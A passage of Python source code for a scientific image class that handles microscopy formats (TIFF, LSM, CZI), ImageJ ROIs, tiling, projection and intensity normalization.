z = np.concatenate((z[..., 0, np.newaxis], z[..., 1, np.newaxis],
np.zeros_like(z[..., 0, np.newaxis])), axis=-1)
with warnings.catch_warnings(): # force it 8 bits for these rough formats
warnings.simplefilter('ignore')
z = img_as_ubyte(z)
new_im = Image.fromarray(z)
new_im.save(
output_name.replace('*', 'z{:04d}'.format(z_counter))) # replace * by z over 4 digits
z_counter += 1
self.save_IJ_ROIs_or_overlays(output_name)
# returns IJ ROIs from metadata
def get_IJ_ROIs(self):
try:
# trying to save ROIs from ij images
from roifile import ImagejRoi
rois = []
if self.metadata['Overlays'] is not None:
overlays = self.metadata['Overlays']
if isinstance(overlays, list):
if overlays:
overlays = [ImagejRoi.frombytes(roi) for roi in overlays]
rois.extend(overlays)
else:
overlays = ImagejRoi.frombytes(overlays)
rois.append(overlays)
if self.metadata['ROI'] is not None:
rois_ = self.metadata['ROI']
print(len(rois_), rois_)
if isinstance(rois_, list):
if rois_:
rois_ = [ImagejRoi.frombytes(roi) for roi in rois_]
rois.extend(rois_)
else:
rois_ = ImagejRoi.frombytes(rois_)
rois.append(rois_)
if not rois:
return None
return rois
except:
# no big deal if it fails --> just print error for now
traceback.print_exc()
# maybe do an IJ ROI editor some day ????
# saves IJ ROIs as a .roi file or .zip file
def save_IJ_ROIs_or_overlays(self, filename):
try:
# trying to save ROIs from ij images
rois = self.get_IJ_ROIs()
if not rois:
return
output_filename = filename
if len(rois) > 1:
# delete file if exists
output_filename += '.zip'
if os.path.exists(output_filename):
os.remove(output_filename)
else:
output_filename += '.roi'
if rois is not None and rois:
for roi in rois:
roi.tofile(output_filename)
except:
# no big deal if it fails --> just print error for now
traceback.print_exc()
def get_width(self):
return self.get_dimension('w')
def get_height(self):
return self.get_dimension('h')
def projection(self, type='max'):
'''creates projection
TODO add more proj
Parameters
----------
type : string
projection type
'''
# TODO implement that more wisely asking just which dimension should be projected and projection type
proj_dimensions = []
if self.has_t():
proj_dimensions.append(self.get_dimension('t'))
proj_dimensions.append(self.get_height())
proj_dimensions.append(self.get_width())
if self.has_c():
proj_dimensions.append(self.get_dimension('c'))
projection = np.zeros(tuple(proj_dimensions), dtype=self.dtype)
if type == 'max':
if self.has_t():
# do proj for each channel
if self.has_c():
for t in range(self.shape[0]):
if self.has_d():
for z in self[t][:]:
for i in range(z.shape[-1]):
projection[t, ..., i] = np.maximum(projection[t, ..., i], z[..., i])
# print(projection.shape)
return Img(projection, dimensions='thwc')
else:
for t in range(self.shape[0]):
if self.has_d():
for z in self[t]:
projection[t] = np.maximum(projection[t], z)
return Img(projection, dimensions='thw')
elif self.has_c():
if self.has_d():
for z in self[:]:
for i in range(z.shape[-1]):
projection[..., i] = np.maximum(projection[..., i], z[..., i])
return Img(projection, dimensions='hwc')
else:
if self.has_d():
for z in self[:]:
projection = np.maximum(projection, z)
return Img(projection, dimensions='hw')
else:
logger.critical("projection type " + type + " not supported yet")
return None
return self
# TODO DANGER!!!! OVERRIDING __str__ CAUSES HUGE TROUBLE BUT NO CLUE WHY
# --> this messes the whole class and the slicing of the array --> DO NOT PUT IT BACK --> NO CLUE WHY THOUGH
# def __str__(self):
def to_string(self):
'''A string representation of this image
'''
description = '#' * 20
description += '\n'
description += 'Image:'
description += '\n'
description += 'vx=' + str(self.metadata['vx']) + ' vy=' + str(self.metadata['vy']) + ' vz=' + str(
self.metadata['vz'])
description += '\n'
description += 'dimensions=' + self.metadata['dimensions']
description += '\n'
description += 'shape=' + str(self.shape)
description += '\n'
description += self.metadata.__str__()
description += '\n'
dimensions_sizes = self.get_dimensions()
for k, v in dimensions_sizes.items():
description += k + '=' + str(v) + ' '
description += '\n'
description += str(super.__str__(self))
description += '\n'
description += '#' * 20
return description
# below assumes channels last
@staticmethod
def BGR_to_RGB(bgr):
return bgr[..., ::-1]
@staticmethod
def RGB_to_BGR(rgb):
return rgb[..., ::-1]
@staticmethod
def RGB_to_GBR(rgb):
return rgb[..., [2, 0, 1]]
@staticmethod
def RGB_to_GRB(rgb):
return rgb[..., [1, 0, 2]]
@staticmethod
def RGB_to_RBG(rgb):
return rgb[..., [0, 2, 1]]
@staticmethod
def RGB_to_BRG(rgb):
return rgb[..., [2, 0, 1]]
# TODO code that better
def getQimage(self):
'''get a qimage from ndarray
Returns
-------
qimage
a pyqt compatible image
'''
logger.debug('Creating a qimage from a numpy image')
img = self
dims = []
for d in self.metadata['dimensions']:
if d in ['w', 'h', 'c', 'x', 'y']:
dims.append(slice(None))
else:
dims.append(0)
img = img[tuple(dims)]
img = np.ndarray.copy(img) # need copy the array
if img.dtype != np.uint8:
# just to remove the warning raised by img_as_ubyte
with warnings.catch_warnings():
warnings.simplefilter('ignore')
try:
# need manual conversion of the image so that it can be read as 8 bit or alike
# force image between 0 and 1 then do convert
img = img_as_ubyte((img - img.min()) / (img.max() - img.min()))
except:
print('error converting image to 8 bits')
return None
bytesPerLine = img.strides[0]
if self.has_c() and self.get_dimension('c') is not None and self.get_dimension('c') != 0:
nb_channels = self.get_dimension('c')
logger.debug('Image has ' + str(nb_channels) + ' channels')
if nb_channels == 3:
qimage = QImage(img.data, self.get_width(), self.get_height(), bytesPerLine,
QImage.Format_RGB888)
elif nb_channels < 3:
# add n dimensions
bgra = np.zeros((self.get_height(), self.get_width(), 3), np.uint8, 'C')
if img.shape[2] >= 1:
bgra[..., 0] = img[..., 0]
if img.shape[2] >= 2:
bgra[..., 1] = img[..., 1]
if img.shape[2] >= 3:
bgra[..., 2] = img[..., 2]
qimage = QImage(bgra.data, self.get_width(), self.get_height(), bgra.strides[0], QImage.Format_RGB888)
else:
if nb_channels == 4:
bgra = np.zeros((self.get_height(), self.get_width(), 4), np.uint8, 'C')
bgra[..., 0] = img[..., 0]
bgra[..., 1] = img[..., 1]
bgra[..., 2] = img[..., 2]
if img.shape[2] >= 4:
logger.debug('using 4th numpy color channel as alpha for qimage')
bgra[..., 3] = img[..., 3]
else:
bgra[..., 3].fill(255)
qimage = QImage(bgra.data, self.get_width(), self.get_height(), bgra.strides[0],
QImage.Format_ARGB32)
else:
# TODO
logger.error("not implemented yet!!!!, too many channels")
else:
qimage = QImage(img.data, self.get_width(), self.get_height(), bytesPerLine,
QImage.Format_Indexed8)
# required to allow creation of a qicon --> need keep
for i in range(256):
qimage.setColor(i, QColor(i, i, i).rgb())
return qimage
@staticmethod
def interpolation_free_rotation(img, angle=90):
'''performs a rotation that does not require interpolation
:param img: image to be rotated
:param angle: int in [90, 180, 270] or 'random' string
:return: a rotated image without interpolation
'''
if angle is 'random':
angle = random.choice([90, 180, 270])
return Img.interpolation_free_rotation(img, angle=angle)
else:
if angle < 0:
angle = 360 + angle
if angle == 270:
return np.rot90(img, 3)
elif angle == 180:
return np.rot90(img, 2)
else:
return np.rot90(img)
@staticmethod
def get_2D_tiles_with_overlap(inp, width=512, height=512, overlap=0, overlap_x=None, overlap_y=None, dimension_h=0,
dimension_w=1, force_to_size=False):
'''split 2 and 3D images with h/w overlap
Parameters
----------
inp : ndarray
input image to be cut into tiles
width : int
desired tile width
height : int
desired tile width
overlap : int
tile w and h overlap
overlap_x : int
tile overlap w axis (if set overrides overlap)
overlap_y : int
tile overlap y axis (if set overrides overlap)
dimension_h : int
position of the h dimension in the ndarray
dimension_w : int
position of the w dimension in the ndarray
force_to_size : boolean
if True add empty pixels around the image to force image to have width and height
Returns
-------
dict, 2D list
a dict containing instructions to reassemble the tiles, and a 2D list containing all the tiles
'''
if overlap_x is None:
overlap_x = overlap
if overlap_y is None:
overlap_y = overlap
# for debug
# overlap_x = 32
# overlap_y = 32
if dimension_h < 0:
dimension_h = len(inp.shape) + dimension_h
if dimension_w < 0:
dimension_w = len(inp.shape) + dimension_w
# print('inpshape', inp.shape, width, height, dimension_h, dimension_w)
final_height = inp.shape[dimension_h]
final_width = inp.shape[dimension_w]
if overlap_x % 2 != 0 or overlap_y % 2 != 0:
logger.error(
'Warning overlap in x or y dimension is not even, this will cause numerous errors please do change this!')
last_idx = 0
cuts_y = []
end = 0
# print(overlap_x, overlap_y, 'overlap')
if height >= inp.shape[dimension_h]:
overlap_y = 0
if width >= inp.shape[dimension_w]:
overlap_x = 0
# print(overlap_x, overlap_y, 'overlap', height, width, inp.shape[dimension_w], inp.shape[dimension_h])
if height + overlap_y < inp.shape[dimension_h]:
for idx in range(height, inp.shape[dimension_h], height):
begin = last_idx
end = idx + overlap_y
if begin < 0:
begin = 0
if end >= inp.shape[dimension_h]:
end = inp.shape[dimension_h]
cuts_y.append((begin, end))
last_idx = idx
if end < inp.shape[dimension_h] - 1:
begin = last_idx
end = inp.shape[dimension_h]
if begin < 0:
begin = 0
cuts_y.append((begin, end))
elif height + overlap_y > inp.shape[dimension_h]:
height += overlap_y
overlap_y = 0
padding = []
for dim in range(len(inp.shape)):
padding.append((0, 0))
# padding_required = False
padding[dimension_h] = (0, height - inp.shape[dimension_h])
# padding_required = True
# bigger = np.zeros(
# (*inp.shape[:dimension_h], height + overlap_y, inp.shape[dimension_w], *inp.shape[dimension_w + 1:]),
# dtype=inp.dtype)
# if dimension_h == 2:
# bigger[:, :, :inp.shape[dimension_h], :inp.shape[dimension_w]] = inp
# elif dimension_h == 1:
# bigger[:, :inp.shape[dimension_h], :inp.shape[dimension_w]] = inp
# elif dimension_h == 0:
# bigger[:inp.shape[dimension_h], :inp.shape[dimension_w]] = inp
bigger = np.pad(inp, pad_width=tuple(padding), mode='symmetric')
inp = bigger
del bigger
cuts_y.append((0, inp.shape[dimension_h]))
else:
cuts_y.append((0, inp.shape[dimension_h]))
# now split image along x direction
last_idx = 0
cuts_x = []
if width + overlap_x < inp.shape[dimension_w]:
for idx in range(width, inp.shape[dimension_w], width):
begin = last_idx
end = idx + overlap_x
if begin < 0:
begin = 0
if end >= inp.shape[dimension_w]:
end = inp.shape[dimension_w]
cuts_x.append((begin, end))
last_idx = idx
if end < inp.shape[dimension_w] - 1:
begin = last_idx
end = inp.shape[dimension_w]
if begin < 0:
begin = 0
cuts_x.append((begin, end))
elif width + overlap_x > inp.shape[dimension_w]:
width += overlap_x
overlap_x = 0
# bigger = np.zeros((*inp.shape[:dimension_w], width + overlap_x, *inp.shape[dimension_w + 1:]),
# dtype=inp.dtype)
# if dimension_w == 3:
# bigger[:, :, :inp.shape[dimension_h], :inp.shape[dimension_w]] = inp
# elif dimension_w == 2:
# bigger[:, :inp.shape[dimension_h], :inp.shape[dimension_w]] = inp
# elif dimension_w == 1:
# bigger[:inp.shape[dimension_h], :inp.shape[dimension_w]] = inp
padding = []
for dim in range(len(inp.shape)):
padding.append((0, 0))
# padding_required = False
padding[dimension_w] = (0, width - inp.shape[dimension_w])
bigger = np.pad(inp, pad_width=tuple(padding), mode='symmetric')
inp = bigger
del bigger
cuts_x.append((0, inp.shape[dimension_w]))
else:
cuts_x.append((0, inp.shape[dimension_w]))
nb_tiles = 0
final_splits = []
for x_begin, x_end in cuts_x:
cols = []
for y_begin, y_end in cuts_y:
# try crop with real data if possible otherwise add black area around
if (y_end == inp.shape[0] or x_end == inp.shape[1]) and (
width + overlap_x <= inp.shape[1] and height + overlap_y <= inp.shape[0]):
if dimension_h == 2:
cur_slice = inp[:, :, y_end - (height + overlap_y):y_end, x_end - (width + overlap_x):x_end]
elif dimension_h == 1:
cur_slice = inp[:, y_end - (height + overlap_y):y_end, x_end - (width + overlap_x):x_end]
elif dimension_h == 0:
cur_slice = inp[y_end - (height + overlap_y):y_end, x_end - (width + overlap_x):x_end]
else:
if dimension_h == 2:
cur_slice = inp[:, :, y_begin:y_end, x_begin:x_end]
elif dimension_h == 1:
cur_slice = inp[:, y_begin:y_end, x_begin:x_end]
elif dimension_h == 0:
cur_slice = inp[y_begin:y_end, x_begin:x_end]
nb_tiles += 1
if not force_to_size:
cols.append(cur_slice)
else:
# if size is still smaller than desired resize
padding = []
for dim in range(len(cur_slice.shape)):
padding.append((0, 0))
padding_required = False
if cur_slice.shape[dimension_h] < height + overlap_y:
padding[dimension_h] = (0, (height + overlap_y) - cur_slice.shape[dimension_h])
padding_required = True
# bigger = np.zeros(
# (*cur_slice.shape[:dimension_h], height + overlap_y, cur_slice.shape[dimension_w],
# *cur_slice.shape[dimension_w + 1:]), dtype=cur_slice.dtype)
# if dimension_h == 2:
# bigger[:, :, :cur_slice.shape[dimension_h], :cur_slice.shape[dimension_w]] = cur_slice
# elif dimension_h == 1:
# bigger[:, :cur_slice.shape[dimension_h], :cur_slice.shape[dimension_w]] = cur_slice
# elif dimension_h == 0:
# bigger[:cur_slice.shape[dimension_h], :cur_slice.shape[dimension_w]] = cur_slice
if cur_slice.shape[dimension_w] < width + overlap_x:
padding[dimension_w] = (0, (width + overlap_x) - cur_slice.shape[dimension_w])
padding_required = True
# print('padding_required', padding_required, cur_slice.shape[dimension_h],cur_slice.shape[dimension_w], width + overlap_x, height+overlap_x)
if padding_required:
# print('dding here', padding)
bigger = np.pad(cur_slice, pad_width=tuple(padding), mode='symmetric')
cur_slice = bigger
del bigger
# if cur_slice.shape[dimension_w] < width + overlap_x:
# bigger = np.zeros(
# (*cur_slice.shape[:dimension_w], width + overlap_x, *cur_slice.shape[dimension_w + 1:]),
# dtype=cur_slice.dtype)
# if dimension_w == 3:
# bigger[:, :, :cur_slice.shape[dimension_h], :cur_slice.shape[dimension_w]] = cur_slice
# elif dimension_w == 2:
# bigger[:, :cur_slice.shape[dimension_h], :cur_slice.shape[dimension_w]] = cur_slice
# elif dimension_w == 1:
# bigger[:cur_slice.shape[dimension_h], :cur_slice.shape[dimension_w]] = cur_slice
# cur_slice = bigger
cols.append(cur_slice)
final_splits.append(cols)
crop_params = {'overlap_y': overlap_y, 'overlap_x': overlap_x, 'final_height': final_height,
'final_width': final_width, 'n_cols': len(final_splits[0]), 'n_rows': len(final_splits),
'nb_tiles': nb_tiles}
return crop_params, final_splits
@staticmethod
def tiles_to_linear(tiles):
'''converts tiles to a 1D list
Parameters
----------
tiles : 2D list
image tiles
Returns
-------
list
1D list containing tiles
'''
linear = []
for idx in range(len(tiles)):
for j in range(len(tiles[0])):
linear.append(tiles[idx][j])
return linear
@staticmethod
def tiles_to_batch(tiles):
'''converts 2D list of tiles to an ndarray with a batch dimension (for tensorflow input)
Parameters
----------
tiles : 2D list
tiled image
Returns
-------
ndarray
ndarray with a batch dimension as the first dimension
'''
linear = Img.tiles_to_linear(tiles)
out = np.concatenate(tuple(linear), axis=0)
return out
@staticmethod
def normalization(img, method=None, range=None, individual_channels=False, clip=False,
normalization_minima_and_maxima=None):
'''normalize an image
Parameters
----------
img : ndarray
input image
method : string
normalization method
range : list
range of the image after normalization (e.g. [0, 1], [-1,1]
individual_channels : boolean
if True normalization is per channel (i.e. max and min are computed for each channel individually, rather than globally)
Returns
-------
ndarray
a normalized image
'''
if img is None:
logger.error("'None' image cannot be normalized")
return
logger.debug('max before normalization=' + str(img.max()) + ' min before normalization=' + str(img.min()))
if method is None or method == 'None':
logger.debug('Image is not normalized')
return img
if 'ercentile' in method:
logger.debug('Image will be normalized using percentiles')
img = img.astype(np.float32)
img = Img._nomalize(img, individual_channels=individual_channels, method=method,
norm_range=range, clip=clip,
normalization_minima_and_maxima=normalization_minima_and_maxima) # TODO if range is list of list --> assume per channel data and do norm that way --> TODO --> think about the best way to do that
logger.debug('max after normalization=' + str(img.max()) + ' min after normalization=' + str(img.min()))
return img
elif 'ormalization' in method and not 'tandardization' in method:
logger.debug('Image will be normalized')
img = img.astype(np.float32)
img = Img._nomalize(img, individual_channels=individual_channels, method=method,
norm_range=range)
logger.debug('max after normalization=' + str(img.max()) + ' min after normalization=' + str(img.min()))
return img
elif 'tandardization' in method:
logger.debug('Image will be standardized')
img = img.astype(np.float32)
img = Img._standardize(img, individual_channels=individual_channels, method=method,
norm_range=range)
logger.debug('max after standardization=' + str(img.max()) + ' min after standardization=' + str(img.min()))
return img
else:
logger.error('unknown normalization method ' + str(method))
return img
# https://en.wikipedia.org/wiki/Feature_scaling
@staticmethod
def _nomalize(img, individual_channels=False, method='Rescaling (min-max normalization)', norm_range=None,
clip=False, normalization_minima_and_maxima=None):
eps = 1e-20 # for numerical stability avoid division by 0
if individual_channels:
for c in range(img.shape[-1]):
norm_min_max = None
if normalization_minima_and_maxima is not None:
# if list of list then use that --> in fact could also check if individual channel or not...
if isinstance(normalization_minima_and_maxima[0], list):
norm_min_max = normalization_minima_and_maxima[c]
else:
norm_min_max = normalization_minima_and_maxima
img[..., c] = Img._nomalize(img[..., c], individual_channels=False, method=method,
norm_range=norm_range, clip=clip,
normalization_minima_and_maxima=norm_min_max)
else:
# that should work
if 'percentile' in method:
# direct_range ??? --> think how to do that ???
# TODO here in some cases need assume passed directly the percentiles and in that case need not do that again... --> think how to do that --> shall I pass a second parameter directly --> maybe direct_range that bypasses the percentiles if set --> TODO --> check that
if normalization_minima_and_maxima is None:
lowest_percentile = np.percentile(img, norm_range[0])
highest_percentile = np.percentile(img, norm_range[1])
else:
lowest_percentile = normalization_minima_and_maxima[0]
highest_percentile = normalization_minima_and_maxima[1]
try:
import numexpr
img = numexpr.evaluate(
"(img - lowest_percentile) / ( highest_percentile - lowest_percentile + eps )")
except:
img = (img - lowest_percentile) / (highest_percentile - lowest_percentile + eps)
if clip:
img = np.clip(img, 0, 1)
elif method == 'Rescaling (min-max normalization)':
max = img.max()
min = img.min()
# if max != 0 and max != min:
if norm_range is None or norm_range == [0, 1] or norm_range == '[0, 1]' or norm_range == 'default' \
or isinstance(norm_range, int):
try:
import numexpr
img = numexpr.evaluate("(img - min) / (max - min + eps)")
except:
img = (img - min) / (
max - min + eps) # TODO will it take less memory if I split it into two lines
elif norm_range == [-1, 1] or norm_range == '[-1, 1]':
try:
import numexpr
img = numexpr.evaluate("-1 + ((img - min) * (1 - -1)) / (max - min + eps)")
except:
img = -1 + ((img - min) * (1 - -1)) / (max - min + eps)
elif method == 'Mean normalization':
# TODO should I implement range too here ??? or deactivate it
max = img.max()
min = img.min()
if max != 0 and max != min:
img = (img - np.average(img)) / (max - min)
elif method.startswith('Max normalization'): # here too assume 0-1 no need for range
if 'auto' in method:
max = img.max()
elif '255' in method:
max = 255
elif '4095' in method:
max = 4095
elif '65535' in method:
max = 65535
if max != 0:
try:
import numexpr
img = numexpr.evaluate("img / max")
except:
img = img / max
else:
logger.error('Unknown normalization method "' + str(method) + '" --> ignoring ')
return img
@staticmethod
def _standardize(img, individual_channels=False, method=None, norm_range=range):
if individual_channels:
for c in range(img.shape[-1]):
img[..., c] = Img._standardize(img[..., c], individual_channels=False, method=method,
norm_range=norm_range)
else:
mean = np.mean(img)
std = np.std(img)
# print('mean', mean, 'std', std)
if std != 0.0:
img = (img - mean) / std
else:
print('error empty image')
if mean != 0.0:
img = (img - mean)
if norm_range == [0, 1] or norm_range == [-1, 1] or norm_range == '[0, 1]' or norm_range == '[-1, 1]':
img = Img._nomalize(img, method='Rescaling (min-max normalization)',
individual_channels=individual_channels, norm_range=[0, 1])
if norm_range == [-1, 1] or norm_range == '[-1, 1]':
img = (img - 0.5) * 2.
logger.debug('max after standardization=' + str(img.max()) + ' min after standardization=' + str(img.min()))
return img
@staticmethod
def reassemble_tiles(tiles, crop_parameters, three_d=False):
'''Changes image contrast using scipy
Parameters
----------
tiles : list
input tiles
crop_parameters : dict
parameters required to reassemble the tiles
three_d : boolean
if True assume image is 3D (dhw), 2D (hw) otherwise
Returns
-------
ndarray
a reassembled image from individual tiles
'''
overlap_y = crop_parameters['overlap_y']
overlap_x = crop_parameters['overlap_x']
final_height = crop_parameters['final_height']
final_width = crop_parameters['final_width']
cols = []
for i in range(len(tiles)):
cur_size = 0
for j in range(len(tiles[0])):
if j == 0:
if overlap_y != 0:
y_slice = slice(None, -int(overlap_y / 2))
else:
y_slice = slice(None, None)
elif j == len(tiles[0]) - 1:
if overlap_y != 0:
y_slice = slice(int(overlap_y / 2), None)
else:
y_slice = slice(None, None)
else:
if overlap_y != 0:
y_slice = slice(int(overlap_y / 2), -int(overlap_y / 2))
else:
y_slice = slice(None, None)
if not three_d:
tiles[i][j] = tiles[i][j][y_slice, ...]
cur_size += tiles[i][j].shape[0]
else:
tiles[i][j] = tiles[i][j][:, y_slice, ...]
cur_size += tiles[i][j].shape[1]
if not three_d:
cols.append(np.vstack(tuple(tiles[i])))
else:
cols.append(np.hstack(tuple(tiles[i])))
cur_size = 0
for i in range(len(cols)):
if i == 0:
if overlap_x != 0:
x_slice = slice(None, -int(overlap_x / 2))
else:
x_slice = slice(None, None)
elif i == len(cols) - 1:
if overlap_x != 0:
x_slice = slice(int(overlap_x / 2), None) # orig
else:
x_slice = slice(None, None)
else:
if overlap_x != 0:
x_slice = slice(int(overlap_x / 2), -int(overlap_x / 2))
else:
x_slice = slice(None, None)
if not three_d:
if len(cols[i].shape) == 3:
cols[i] = cols[i][:, x_slice]
else:
cols[i] = cols[i][:, x_slice, ...]
cur_size += cols[i].shape[1]
else:
if len(cols[i].shape) == 3:
cols[i] = cols[i][:, :, x_slice]
else:
cols[i] = cols[i][:, :, x_slice, ...]
cur_size += cols[i].shape[2]
if not three_d:
return np.hstack(tuple(cols))[:final_height, :final_width]
else:
return np.dstack(tuple(cols))[:, :final_height, :final_width]
@staticmethod
def linear_to_2D_tiles(tiles, crop_parameters):
'''converts a 1D list to a 2D list
Parameters
----------
tiles : list
1D list containing tiles
crop_parameters : dict
parameters to recreate a 2D list from a 1D (i.e. nb or rows and cols)
Returns
-------
list
a 2D list containing tiles
'''
n_rows = crop_parameters['n_rows']
n_cols = crop_parameters['n_cols']
nb_tiles = crop_parameters['nb_tiles']
output = []
counter = 0
for i in range(n_rows):
cols = []
for j in range(n_cols):
cols.append(tiles[counter])
counter += 1
output.append(cols)
return output
# should dynamically crop images
def crop(self, **kwargs):
'''crops an image
Parameters
----------
kwargs : dict
a dict containing the top left corner and the bottom right coordinates of the crop x1, y1, x2, y2
Returns
-------
ndarray
a crop of the image
'''
img = self
corrected_metadata = dict(self.metadata)
dims = []
for i in range(len(img.shape)):
dims.append(slice(None))
# get the dim and its begin and end and create the appropriate slice
for key, value in kwargs.items():
if key in self.metadata['dimensions']:
idx = self.metadata['dimensions'].index(key)
if isinstance(value, list):
if len(value) == 2:
dims[idx] = slice(value[0], value[1])
elif len(value) == 3:
dims[idx] = slice(value[0], value[1], value[2])
# update the width and height parameters then or suppress w and h parameters from the data to avoid pbs
elif len(value) == 1:
dims[idx] = value
corrected_metadata.update(
{'dimensions': corrected_metadata['dimensions'].replace(key, '')}) # do remove dimension
else:
if value is not None:
dims[idx] = value
corrected_metadata.update(
{'dimensions': corrected_metadata['dimensions'].replace(key, '')}) # do remove dimension
else:
dims[idx] = slice(None)
# TODO need reduce size dim for the stuff in the metadata to avoid bugs
img = np.ndarray.copy(img[tuple(dims)])
output = Img(img, metadata=corrected_metadata)
return output
# should be able to parse any dimension in fact by its name
# IMPORTANT NEVER CALL IT COPY OTHERWISE OVERRIDES THE DEFAULT COPY METHOD OF NUMPY ARRAY THAT CREATES ERRORS
def imCopy(self, t=None, d=None, c=None):
'''Changes image contrast using scipy
Parameters
----------
t : int
the index of the time series to copy
d : int
the index of the z/d to copy
c : int
the channel to copy
Returns
-------
Img
a (sub)copy of the image
'''
img = self
corrected_metadata = dict(self.metadata)
dims = []
for i in range(len(img.shape)):
dims.append(slice(None))
if t is not None and self.has_t():
idx = self.metadata['dimensions'].index('t')
dims[idx] = t
corrected_metadata.update({'dimensions': corrected_metadata['dimensions'].replace('t', '')})
if d is not None and self.has_d():
idx = self.metadata['dimensions'].index('d')
dims[idx] = d
corrected_metadata.update({'dimensions': corrected_metadata['dimensions'].replace('d', '')})
if c is not None and self.has_c():
idx = self.metadata['dimensions'].index('c')
dims[idx] = c
corrected_metadata.update({'dimensions': corrected_metadata['dimensions'].replace('c', '')})
# TODO finalize this to handle any slicing possible --> in fact it's relatively easy
img = np.ndarray.copy(img[tuple(dims)])
output = Img(img, metadata=corrected_metadata)
return output
def within(self, x, y):
''' True if a pixel within the image, False otherwise
'''
if x >= 0 and x < self.get_width() and y >= 0 and y < self.get_height():
return True
return False
@staticmethod
def clip(img, tuple=None, min=None, max=None):
# clip an image to a defined range
if tuple is not None:
min = tuple[0]
max = tuple[1]
img = np.clip(img, a_min=min, a_max=max)
return img
@staticmethod
def invert(img):
# should take the negative of an image should always work I think but try and see if not wise making a version that handles channels # does it even make sense ??? need to think a bit about it
max = img.max()
img = np.negative(img) + max
return img
@staticmethod
def clip_by_frequency(img, lower_cutoff=None, upper_cutoff=0.05, channel_mode=True):
logger.debug(' inside clip ' + str(lower_cutoff) + str(upper_cutoff) + str(channel_mode))
if lower_cutoff == upper_cutoff == 0:
logger.debug('clip: keep image unchanged')
return img
if lower_cutoff is None and upper_cutoff == 0:
logger.debug('clip: keep image unchanged')
return img
if upper_cutoff is None and lower_cutoff == 0:
logger.debug('clip: keep image unchanged')
return img
if lower_cutoff == upper_cutoff == None:
logger.debug('clip: keep image unchanged')
return img
logger.debug('chan mode ' + str(channel_mode))
if channel_mode:
for ch in range(img.shape[-1]):
img[..., ch] = Img.clip_by_frequency(img[..., ch], lower_cutoff=lower_cutoff, upper_cutoff=upper_cutoff,
channel_mode=False)
return img
# print('min', img.min(), 'max', img.max())
if img.max() == img.min():
return img
logger.debug('Removing image outliers/hot pixels')
# hist, bins = np.histogram(img, bins=np.arange(img.min(), img.max()+1),
# density=True)
# print(np.percentile(img, 100*(lower_cutoff)))
# print(np.percentile(img, 100*(1-upper_cutoff)))
# print('hist', hist)
# print(hist.sum()) # sums to 1
# print('bins', bins)
if upper_cutoff is not None: # added this to avoid black images
# cum_freq = 0.
# max = bins[-1]
# for idcs, val in enumerate(hist[::-1]):
# cum_freq += val
# if cum_freq >= upper_cutoff:
# max = bins[len(bins) - 1 - idcs]
# break
# print(np.percentile(img, lower_cutoff))
max = np.percentile(img, 100. * (1. - upper_cutoff))
img[img > max] = max
if lower_cutoff is not None:
# cum_freq = 0.
# min = bins[0]
# for idcs, val in enumerate(hist):
# cum_freq += val
# if cum_freq >= lower_cutoff:
# min = bins[idcs]
# break
min = np.percentile(img, 100. * lower_cutoff)
img[img < min] = min
# print('--> min', img.min(), 'max', img.max())
return img
class ImageReader:
def read(f, serie_to_open=None):
width = None
height = None
depth = None
channels = None
voxel_x = None
voxel_y = None
voxel_z = None
times = None
bits = None
t_frames = None
luts = None
ar = None
overlays = None
roi = None
dimensions_string = ''
metadata = {'w': width, 'h': height, 'c': channels, 'd': depth, 't': t_frames, 'bits': bits, 'vx': voxel_x,
'vy': voxel_y, 'vz': voxel_z, 'AR': ar, 'dimensions': dimensions_string, 'LUTs': luts,
'times': times, 'Overlays': overlays, 'ROI': roi} # TODO check always ok
logger.debug('loading' + str(f))
if f.lower().endswith('.tif') or f.lower().endswith('.tiff') or f.lower().endswith(
'.lsm'):
with tifffile.TiffFile(f) as tif:
# TODO need handle ROIs there!!!
# just copy stuff
# --> can then use it and pass it directly then if needed --> maybe need a smart handling in case there is a reduction of the number of dimensions to only keep the correct ROIs
# if image is IJ image preserve ROIs and overlays
if tif.is_imagej:
if 'Overlays' in tif.imagej_metadata:
overlays = tif.imagej_metadata['Overlays']
metadata['Overlays'] = overlays
if 'ROI' in tif.imagej_metadata:
roi = tif.imagej_metadata['ROI']
metadata['ROI'] = roi
tif_tags = {}
for tag in tif.pages[0].tags.values():
name, value = tag.name, tag.value
tif_tags[name] = value
logger.debug(''' + name + ''' + '\'' + str(value) + '\'')
if name == 'ImageWidth':
width = value
elif name == 'ImageLength':
height = value
elif name == 'BitsPerSample':
if not isinstance(value, tuple):
bits = value
else:
bits = value[0]
elif name == 'XResolution':
voxel_x = value[1] / value[0]
elif name == 'YResolution':
voxel_y = value[1] / value[0]
elif name == 'ImageDescription':
lines = value.split()
for l in lines:
logger.debug('1'' + l + ''1')
if l.startswith('channels'):
_, val = l.split('=')
channels = int(val)
elif l.startswith('slices'): # Z slices
_, val = l.split('=')
depth = int(val)
elif l.startswith('frames'): # time frames
_, val = l.split('=')
t_frames = int(val)
elif l.startswith('spacing'):
_, val = l.split('=')
voxel_z = float(val)
# read lsm
if isinstance(value, dict):
for name, value in value.items():
logger.debug(name + ' ' + str(value))
if name == 'DimensionZ':
depth = value
elif name == 'DimensionX':
width = value
elif name == 'DimensionY':
height = value
elif name == 'DimensionTime':
t_frames = value
if t_frames == 1:
t_frames = None
elif name == 'DimensionChannels':
channels = value
elif name == 'VoxelSizeX':
voxel_x = value * 1_000_000
elif name == 'VoxelSizeY':
voxel_y = value * 1_000_000
elif name == 'VoxelSizeZ':
voxel_z = value * 1_000_000
elif name == 'TimeStamps':
times = value
elif name == 'ChannelColors':
luts = value['Colors']
if f.lower().endswith('.tif') or f.lower().endswith('.tiff') or f.lower().endswith('.lsm'):
image_stack = tifffile.imread(f)
image = image_stack
image = np.squeeze(image)
elif f.lower().endswith('.czi'):
with czifile.CziFile(f) as czi:
meta_data = czi.metadata(
raw=False) # raw=False --> there is a bug it can't read properly the dimension xyz there --> parse myself the xml --> easy # retrun metadata as dict --> recover parameters # set it to false to get xml
logger.debug(meta_data)
xml_metadata = czi.metadata()
root = ET.fromstring(xml_metadata)
# manually parse xml as dict is erroneous to get the x, y and z voxel sizes
for l in root.findall('./*/Scaling/Items/Distance'):
rank = l.find('Value').text
name = l.get('Id')
if name == 'X':
voxel_x = float(rank) * 1_000_000
if name == 'Y':
voxel_y = float(rank) * 1_000_000
if name == 'Z':
voxel_z = float(rank) * 1_000_000
image = czi.asarray()
bits = meta_data['ImageDocument']['Metadata']['Information']['Image']['ComponentBitCount']
width = meta_data['ImageDocument']['Metadata']['Information']['Image']['SizeX']
height = meta_data['ImageDocument']['Metadata']['Information']['Image']['SizeY']
